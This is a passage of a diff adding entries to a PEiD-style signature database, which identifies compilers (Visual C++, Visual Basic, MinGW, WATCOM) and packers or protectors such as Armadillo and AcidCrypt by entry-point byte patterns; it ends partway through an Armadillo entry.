+signature = ?? ?? ?? ?? ?? ?? ?? 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 00 00 00 ?? ?? ?? ?? 00 00 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 00 00 ?? ?? ?? 00 00 ?? ?? ?? 00 00 ?? ?? ?? 00 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 00 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 00 ?? ?? ?? 00 ?? 00 ?? ?? ?? 00 00 ?? ?? ?? 00 00 ?? ?? ?? ?? ?? ?? 00 ?? 00
+ep_only = true
+
+[Microsoft Visual C++ v6.0 SPx]
+signature = 55 8B EC 83 EC 44 56 FF 15 ?? ?? ?? ?? 8B F0 8A ?? 3C 22
+ep_only = true
+
+[Microsoft Visual C++ v6.0 SPx]
+signature = 55 8B EC 83 EC 44 56 FF 15 ?? ?? ?? ?? 6A 01 8B F0 FF 15
+ep_only = true
+
+[Microsoft Visual C++ v6.0]
+signature = 55 8B EC 6A FF 68 68 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 53 56 57
+ep_only = true
+
+[Microsoft Visual C++ v6.0 DLL]
+signature = ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 51 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 00 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? 8B ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 00 ?? ?? 8B ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 8B ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 4D ?? ?? ?? ?? 02
+ep_only = true
+
+[Microsoft Visual C++ v6.0 DLL]
+signature = 83 7C 24 08 01 75 09 8B 44 24 04 A3 ?? ?? 00 10 E8 8B FF FF FF
+ep_only = true
+
+[Microsoft Visual C++ v6.0]
+signature = 55 8B EC 83 EC 50 53 56 57 BE ?? ?? ?? ?? 8D 7D F4 A5 A5 66 A5 8B
+ep_only = true
+
+[Microsoft Visual C++ v6.0 DLL]
+signature = 55 8D 6C ?? ?? 81 EC ?? ?? ?? ?? 8B 45 ?? 83 F8 01 56 0F 84 ?? ?? ?? ?? 85 C0 0F 84
+ep_only = true
+
+[Microsoft Visual C++ v6.0 DLL]
+signature = 55 8B EC 53 8B 5D 08 56 8B 75 0C
+ep_only = true
+
+[Microsoft Visual C++ v6.0]
+signature = ?? ?? ?? ?? ?? ?? ?? ?? ?? 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 00 ?? ?? ?? 0D ?? ?? ?? 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 00 ?? ?? ?? ?? ?? ?? ?? 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 1C ?? ?? 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 00 FF ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 00 ?? ?? ?? ?? 00
+ep_only = true
+
+[Microsoft Visual C++ v6.0 (Debug Version)]
+signature = 55 8B EC 51 ?? ?? ?? 01 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 10 ?? ?? ?? ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 00 00
+ep_only = true
+
+[Microsoft Visual C++ v7.0]
+signature = 6A ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? BF ?? ?? ?? ?? 8B C7 E8 ?? ?? ?? ?? 89 65 ?? 8B F4 89 3E 56 FF 15 ?? ?? ?? ?? 8B 4E ?? 89 0D ?? ?? ?? ?? 8B 46 ?? A3
+ep_only = true
+
+[Microsoft Visual C++ v7.0 DLL]
+signature = 55 8D 6C ?? ?? 81 EC ?? ?? ?? ?? 8B 45 ?? 83 F8 01 56 0F 84 ?? ?? ?? ?? 85 C0 0F 84
+ep_only = true
+
+[Microsoft Visual C++ v7.0 DLL]
+signature = 55 8B EC 53 8B 5D 08 56 8B 75 0C 85 F6 57 8B 7D 10
+ep_only = true
+
+[Microsoft Visual C++ v7.1 DLL]
+signature = 6A 0C 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 C0 40 89 45 E4
+ep_only = true
+
+[Microsoft Visual C++ v7.1 DLL]
+signature = 83 7C 24 08 01 75 ?? ?? ?? 24 04 50 A3 ?? ?? ?? 50 FF 15 00 10 ?? 50 33 C0 40 C2 0C 00
+ep_only = true
+
+[Microsoft Visual C++ v7.1 DLL]
+signature = 55 8B EC 6A FF 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 C4 E4 53 56 57 89 65 E8 C7 45 E4 01 00 00 00 C7 45 FC
+ep_only = true
+
+[Microsoft Visual C++ v7.1 DLL]
+signature = 55 8B EC 53 8B 5D 08 56 8B 75 0C 85 F6 57 8B 7D 10 75 09 83 3D ?? ?? 40 00 00 EB 26 83 FE 01 74 05 83 FE 02 75 22 A1
+ep_only = true
+
+[Microsoft Visual C++ v7.1 DLL (Debug)]
+signature = 55 8B EC ?? ?? 0C 83 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 00 00 00 8B
+ep_only = true
+
+[Microsoft Visual C++ v7.1 EXE]
+signature = 6A ?? 68 ?? ?? ?? 01 E8 ?? ?? 00 00 66 81 3D 00 00 00 01 4D 5A 75 ?? A1 3C 00 00 01 ?? ?? 00 00 00 01
+ep_only = true
+
+[Microsoft Visual C++ v7.1 EXE]
+signature = 6A ?? 68 ?? ?? ?? ?? E8
+ep_only = true
+
+[Microsoft Visual C++ DLL]
+signature = 53 55 56 8B 74 24 14 85 F6 57 B8 01 00 00 00
+ep_only = true
+
+[Microsoft Visual C++ DLL]
+signature = 53 56 57 BB 01 ?? ?? ?? 8B ?? 24 14
+ep_only = true
+
+[Microsoft Visual C++ DLL]
+signature = 53 B8 01 00 00 00 8B 5C 24 0C 56 57 85 DB 55 75 12 83 3D ?? ?? ?? ?? ?? 75 09 33 C0
+ep_only = true
+
+[Microsoft Visual C++ DLL]
+signature = 55 8B EC 56 57 BF 01 00 00 00 8B 75 0C
+ep_only = true
+
+[Microsoft Visual C++]
+signature = 55 8B EC 6A FF 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 64 A1 00 00 00 00 50 64 89 25 00 00 00 00
+ep_only = true
+
+[Microsoft Visual Basic v5.0]
+signature = ?? ?? ?? ?? ?? ?? ?? FF FF FF 00 00 00 00 00 00 30 00 00 00 40 00 00 00 00 00 00
+ep_only = true
+
+[Microsoft Visual Basic v5.0/v6.0]
+signature = 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 00 00 00 00 00 00 30 00 00 00
+ep_only = true
+
+[Microsoft Visual Basic v6.0 DLL]
+signature = 5A 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 52 E9 ?? ?? FF
+ep_only = true
+
+[MinGW GCC v2.x]
+signature = 55 89 E5 E8 ?? ?? ?? ?? C9 C3 ?? ?? 45 58 45
+ep_only = true
+
+[MinGW GCC v2.x]
+signature = 55 89 E5 ?? ?? ?? ?? ?? ?? FF FF ?? ?? ?? ?? ?? 00 ?? ?? 00 ?? ?? ?? 00 00 00 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 00 ?? ?? ?? ?? ?? ?? ?? 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 00
+ep_only = true
+
+[MinGW GCC v2.x]
+signature = 55 89 E5 E8 ?? ?? ?? ?? C9 C3 ?? ?? 45 58 45
+ep_only = true
+
+[MinGW GCC DLL v2xx]
+signature = 55 89 E5 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 00 00 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 00 ?? ?? ?? 68
+ep_only = true
+
+[MinGW v3.2.x (Dll_main)]
+signature = 55 89 E5 83 EC 18 89 75 FC 8B 75 0C 89 5D F8 83 FE 01 74 5C 89 74 24 04 8B 55 10 89 54 24 08 8B 55 08 89 14 24 E8 96 01 00 00 83 EC 0C 83 FE 01 89 C3 74 2C 85 F6 75 0C 8B 0D 00 30 00 10 85 C9 75 10 31 DB 89 D8 8B 5D F8 8B 75 FC 89 EC 5D C2 0C 00 E8 59 00 00 00 EB EB 8D B4 26 00 00 00 00 85 C0 75 D0 E8 47 00 00 00 EB C9 90 8D 74 26 00 C7 04 24 80 00 00 00 E8 F4 05 00 00 A3 00 30 00 10 85 C0 74 1A C7 00 00 00 00 00 A3 10 30 00 10 E8 3B 02 00 00 E8 C6 01 00 00 E9 75 FF FF FF E8 BC 05 00 00 C7 00 0C 00 00 00 31 C0 EB 98 89 F6 55 89 E5 83 EC 08 89 5D FC 8B 15 00 30 00 10 85 D2 74 29 8B 1D 10 30 00 10 83 EB 04 39 D3 72 0D 8B 03 85 C0 75 2A 83 EB 04 39 D3 73 F3 89 14 24 E8 6B 05 00 00 31 C0 A3 00 30 00 10 C7 04 24 00 00 00 00 E8 48 05 00 00 8B 5D FC 89 EC 5D C3
+ep_only = true
+
+[MinGW v3.2.x (Dll_WinMain)]
+signature = 55 89 E5 83 EC 18 89 75 FC 8B 75 0C 89 5D F8 83 FE 01 74 5C 89 74 24 04 8B 55 10 89 54 24 08 8B 55 08 89 14 24 E8 76 01 00 00 83 EC 0C 83 FE 01 89 C3 74 2C 85 F6 75 0C 8B 0D 00 30 00 10 85 C9 75 10 31 DB 89 D8 8B 5D F8 8B 75 FC 89 EC 5D C2 0C 00 E8 59 00 00 00 EB EB 8D B4 26 00 00 00 00 85 C0 75 D0 E8 47 00 00 00 EB C9 90 8D 74 26 00 C7 04 24 80 00 00 00 E8 A4 05 00 00 A3 00 30 00 10 85 C0 74 1A C7 00 00 00 00 00 A3 10 30 00 10 E8 1B 02 00 00 E8 A6 01 00 00 E9 75 FF FF FF E8 6C 05 00 00 C7 00 0C 00 00 00 31 C0 EB 98 89 F6 55 89 E5 83 EC 08 89 5D FC 8B 15 00 30 00 10 85 D2 74 29 8B 1D 10 30 00 10 83 EB 04 39 D3 72 0D 8B 03 85 C0 75 2A 83 EB 04 39 D3 73 F3 89 14 24 E8 1B 05 00 00 31 C0 A3 00 30 00 10 C7 04 24 00 00 00 00 E8 F8 04 00 00 8B 5D FC 89 EC 5D C3
+ep_only = true
+
+[MinGW v3.2.x (main)]
+signature = 55 89 E5 83 EC 08 C7 04 24 01 00 00 00 FF 15 E4 40 40 00 E8 68 00 00 00 89 EC 31 C0 5D C3 89 F6 55 89 E5 83 EC 08 C7 04 24 02 00 00 00 FF 15 E4 40 40 00 E8 48 00 00 00 89 EC 31 C0 5D C3 89 F6 55 89 E5 83 EC 08 8B 55 08 89 14 24 FF 15 00 41 40 00 89 EC 5D C3 8D 76 00 8D BC 27 00 00 00 00 55 89 E5 83 EC 08 8B 55 08 89 14 24 FF 15 F4 40 40 00 89 EC 5D C3 8D 76 00 8D BC 27 00 00 00 00 55 89 E5 53 83 EC 24 C7 04 24 A0 11 40 00 E8 8D 07 00 00 83 EC 04 E8 85 02 00 00 C7 04 24 00 20 40 00 8B 15 10 20 40 00 8D 4D F8 C7 45 F8 00 00 00 00 89 4C 24 10 89 54 24 0C 8D 55 F4 89 54 24 08 C7 44 24 04 04 20 40 00 E8 02 07 00 00 A1 20 20 40 00 85 C0 74 76 A3 30 20 40 00 A1 F0 40 40 00 85 C0 74 1F 89 04 24 E8 C3 06 00 00 8B 1D 20 20 40 00 89 04 24 89 5C 24 04 E8 C1 06 00 00
+ep_only = true
+
+[MinGW v3.2.x (WinMain)]
+signature = 55 89 E5 83 EC 08 C7 04 24 01 00 00 00 FF 15 FC 40 40 00 E8 68 00 00 00 89 EC 31 C0 5D C3 89 F6 55 89 E5 83 EC 08 C7 04 24 02 00 00 00 FF 15 FC 40 40 00 E8 48 00 00 00 89 EC 31 C0 5D C3 89 F6 55 89 E5 83 EC 08 8B 55 08 89 14 24 FF 15 18 41 40 00 89 EC 5D C3 8D 76 00 8D BC 27 00 00 00 00 55 89 E5 83 EC 08 8B 55 08 89 14 24 FF 15 0C 41 40 00 89 EC 5D C3 8D 76 00 8D BC 27 00 00 00 00 55 89 E5 53 83 EC 24 C7 04 24 A0 11 40 00 E8 5D 08 00 00 83 EC 04 E8 55 03 00 00 C7 04 24 00 20 40 00 8B 15 10 20 40 00 8D 4D F8 C7 45 F8 00 00 00 00 89 4C 24 10 89 54 24 0C 8D 55 F4 89 54 24 08 C7 44 24 04 04 20 40 00 E8 D2 07 00 00 A1 20 20 40 00 85 C0 74 76 A3 30 20 40 00 A1 08 41 40 00 85 C0 74 1F 89 04 24 E8 93 07 00 00 8B 1D 20 20 40 00 89 04 24 89 5C 24 04 E8 91 07 00 00
+ep_only = true
+
+[MinGW v3.2.x (Dll_mainCRTStartup)]
+signature = 55 89 E5 83 EC 08 6A 00 6A 00 6A 00 6A 00 E8 0D 00 00 00 B8 00 00 00 00 C9 C3 90 90 90 90 90 90 FF 25 38 20 00 10 90 90 00 00 00 00 00 00 00 00 FF FF FF FF 00 00 00 00 FF FF FF FF 00 00 00 00 00
+ep_only = true
+
+[MinGW v3.2.x (_mainCRTStartup)]
+signature = 55 89 E5 83 EC 08 6A 00 6A 00 6A 00 6A 00 E8 0D 00 00 00 B8 00 00 00 00 C9 C3 90 90 90 90 90 90 FF 25 38 20 40 00 90 90 00 00 00 00 00 00 00 00 FF FF FF FF 00 00 00 00 FF FF FF FF 00 00 00 00 00
+ep_only = true
+
+[Stranik 1.3 Modula/C/Pascal]
+signature = E8 ?? ?? FF FF E8 ?? ?? FF FF ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 00 ?? ?? ?? ?? ?? ?? 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 00 ?? ?? ?? ?? ?? ?? 00 ?? ?? ?? ?? ?? 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 00 ?? ?? 00 ?? ?? ?? 00 00 00 ?? ?? ?? 00 ?? ?? 00 ?? 00 ?? 00 00 ?? 00 ?? ?? ?? ?? ?? 00 ?? ?? 00 ?? ?? 00 ?? ?? ?? ?? ?? 00 ?? ?? 00 ?? ?? ?? 00 00 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? 00 ?? ?? 00 ?? ?? ?? 00 00 00 ?? ?? 00 ?? ?? ?? ?? ?? ?? 00 ?? ?? 00 ?? ?? ?? 00 00 00 ?? ?? ?? ?? ?? 00 ?? ?? ?? ?? ?? ?? ?? ?? 00
+ep_only = true
+
+[WATCOM C/C++ 32 Run-Time System 1988-1995]
+signature = E9 ?? ?? ?? ?? ?? ?? ?? ?? 57 41 54 43 4F 4D 20 43 2F 43 2B 2B 33 32 20 52 75 6E 2D 54
+ep_only = true
+
+[WATCOM C/C++ 32 Run-Time System 1988-1994]
+signature = FB 83 ?? ?? 89 E3 89 ?? ?? ?? ?? ?? 89 ?? ?? ?? ?? ?? 66 ?? ?? ?? 66 ?? ?? ?? ?? ?? BB ?? ?? ?? ?? 29 C0 B4 30 CD 21
+ep_only = true
+
+[WATCOM C/C++]
+signature = E9 ?? ?? ?? ?? ?? ?? ?? ?? 57 41
+ep_only = true
+
+[WATCOM C/C++ DLL]
+signature = 53 56 57 55 8B 74 24 14 8B 7C 24 18 8B 6C 24 1C 83 FF 03 0F 87
+ep_only = true
+
+[.BJFnt v1.1b]
+signature = EB 01 EA 9C EB 01 EA 53 EB 01 EA 51 EB 01 EA 52 EB 01 EA 56
+ep_only = true
+
+[.BJFnt v1.2 RC]
+signature = EB 02 69 B1 83 EC 04 EB 03 CD 20 EB EB 01 EB 9C EB 01 EB EB
+ep_only = true
+
+[.BJFnt v1.3]
+signature = EB 03 3A 4D 3A 1E EB 02 CD 20 9C EB 02 CD 20 EB 02 CD 20 60
+ep_only = true
+
+[.BJFnt v1.3]
+signature = EB ?? 3A ?? ?? 1E EB ?? CD 20 9C EB ?? CD 20 EB ?? CD 20 60 EB
+ep_only = true
+
+[32Lite v0.03a]
+signature = 60 06 FC 1E 07 BE ?? ?? ?? ?? 6A 04 68 ?? 10 ?? ?? 68
+ep_only = true
+
+[AcidCrypt]
+signature = 60 B9 ?? ?? ?? 00 BA ?? ?? ?? 00 BE ?? ?? ?? 00 02 38 40 4E 75 FA 8B C2 8A 18 32 DF C0 CB
+ep_only = true
+
+[AcidCrypt]
+signature = BE ?? ?? ?? ?? 02 38 40 4E 75 FA 8B C2 8A 18 32 DF C0 CB
+ep_only = true
+
+[Alloy v1.x.2000]
+signature = 9C 60 E8 02 ?? ?? ?? 33 C0 8B C4 83 C0 04 93 8B E3 8B 5B FC 81 EB 07 20 40 ?? 87 DD 6A 04 68 ?? 10 ?? ?? 68 ?? 02 ?? ?? 6A ?? FF 95 46 23 40 ?? 0B
+ep_only = true
+
+[Armadillo v1.60a]
+signature = 55 8B EC 6A FF 68 98 71 40 00 68 48 2D 40 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 58
+ep_only = true
+
+[Armadillo v1.71]
+signature = 55 8B EC 6A FF 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 64 A1
+ep_only = true
+
+[Armadillo v1.72 - v1.73]
+signature = 55 8B EC 6A FF 68 E8 C1 ?? ?? 68 F4 86 ?? ?? 64 A1 ?? ?? ?? ?? 50 64 89 25 ?? ?? ?? ?? 83 EC 58
+ep_only = true
+
+[Armadillo v1.77]
+signature = 55 8B EC 6A FF 68 B0 71 40 00 68 6C 37 40 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 58
+ep_only = true
+
+[Armadillo v1.80]
+signature = 55 8B EC 6A FF 68 E8 C1 00 00 68 F4 86 00 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 58
+ep_only = true
+
+[Armadillo v1.82]
+signature = 55 8B EC 6A FF 68 E0 C1 40 00 68 74 81 40 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 58
+ep_only = true
+
+[Armadillo v1.83]
+signature = 55 8B EC 6A FF 68 E0 C1 40 00 68 64 84 40 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 58
+ep_only = true
+
+[Armadillo v1.84]
+signature = 55 8B EC 6A FF 68 E8 C1 40 00 68 F4 86 40 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 58
+ep_only = true
+
+[Armadillo v1.90]
+signature = 55 8B EC 6A FF 68 10 F2 40 00 68 64 9A 40 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 58
+ep_only = true
+
+[Armadillo v1.9x]
+signature = 55 8B EC 6A FF 68 98 ?? ?? ?? 68 10 ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 64 89 25 ?? ?? ?? ?? 83 EC 58 53 56 57 89 65 E8 FF 15
+ep_only = true
+
+[Armadillo v1.90b1]
+signature = 55 8B EC 6A FF 68 E0 C1 40 00 68 04 89 40 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 58
+ep_only = true
+
+[Armadillo v1.90b2]
+signature = 55 8B EC 6A FF 68 F0 C1 40 00 68 A4 89 40 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 58
+ep_only = true
+
+[Armadillo v1.90b3]
+signature = 55 8B EC 6A FF 68 08 E2 40 00 68 94 95 40 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 58
+ep_only = true
+
+[Armadillo v1.90b4]
+signature = 55 8B EC 6A FF 68 08 E2 40 00 68 B4 96 40 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 58
+ep_only = true
+
+[Armadillo v1.90a]
+signature = 55 8B EC 64 FF 68 10 F2 40 00 68 14 9B 40 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 58
+ep_only = true
+
+[Armadillo v1.90c]
+signature = 55 8B EC 6A FF 68 10 F2 40 00 68 74 9D 40 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 58
+ep_only = true
+
+[Armadillo v1.xx - v2.xx]
+signature = 55 8B EC 53 8B 5D 08 56 8B 75 0C 57 8B 7D 10 85 F6
+ep_only = true
+
+[Armadillo v2.00]
+signature = 55 8B EC 6A FF 68 00 02 41 00 68 C4 A0 40 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 58
+ep_only = true
+
+[Armadillo v2.00b1]
+signature = 55 8B EC 6A FF 68 98 ?? ?? ?? 68 10 ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 64 89 25 ?? ?? ?? ?? 83 EC 58 53 56 57 89 65 E8 FF 15
+ep_only = true
+
+[Armadillo v2.00b2-2.00b3]
+signature = 55 8B EC 6A FF 68 00 F2 40 00 68 C4 A0 40 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 58
+ep_only = true
+
+[Armadillo v2.01]
+signature = 55 8B EC 6A FF 68 08 02 41 00 68 04 9A 40 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 58
+ep_only = true
+
+[Armadillo v2.10b2]
+signature = 55 8B EC 6A FF 68 18 12 41 00 68 24 A0 40 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 58
+ep_only = true
+
+[Armadillo v2.20]
+signature = 55 8B EC 6A FF 68 10 12 41 00 68 F4 A0 40 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 58
+ep_only = true
+
+[Armadillo v2.20b1]
+signature = 55 8B EC 6A FF 68 30 12 41 00 68 A4 A5 40 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 58
+ep_only = true
+
+[Armadillo v2.50]
+signature = 55 8B EC 6A FF 68 B8 ?? ?? ?? 68 F8 ?? ?? ?? 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 58 53 56 57 89 65 E8 FF 15 20 ?? ?? ?? 33 D2 8A D4 89 15 D0
+ep_only = true
+
+[Armadillo v2.50b1]
+signature = 55 8B EC 6A FF 68 98 ?? ?? ?? 68 10 ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 64 89 25 ?? ?? ?? ?? 83 EC 58 53 56 57 89 65 E8 FF 15
+ep_only = true
+
+[Armadillo v2.50b3]
+signature = 55 8B EC 6A FF 68 B8 ?? ?? ?? 68 F8 ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 64 89 25 ?? ?? ?? ?? 83 EC 58 53 56 57 89 65 E8 FF 15 20 ?? ?? ?? 33 D2 8A D4 89 15 D0
+ep_only = true
+
+[Armadillo v2.51]
+signature = 55 8B EC 6A FF 68 B8 ?? ?? ?? 68 D0 ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 64 89 25 ?? ?? ?? ?? 83 EC 58 53 56 57 89 65 E8 FF 15 20
+ep_only = true
+
+[Armadillo v2.52 beta2]
+signature = 55 8B EC 6A FF 68 ?? ?? ?? ?? B0 ?? ?? ?? ?? 68 60 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 58 53 56 57 89 65 E8 FF ?? ?? ?? 15 24
+ep_only = true
+
+[Armadillo v2.52]
+signature = 55 8B EC 6A FF 68 ?? ?? ?? ?? E0 ?? ?? ?? ?? 68 D4 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 58 53 56 57 89 65 E8 FF ?? ?? ?? 15 38
+ep_only = true
+
+[Armadillo v2.52]
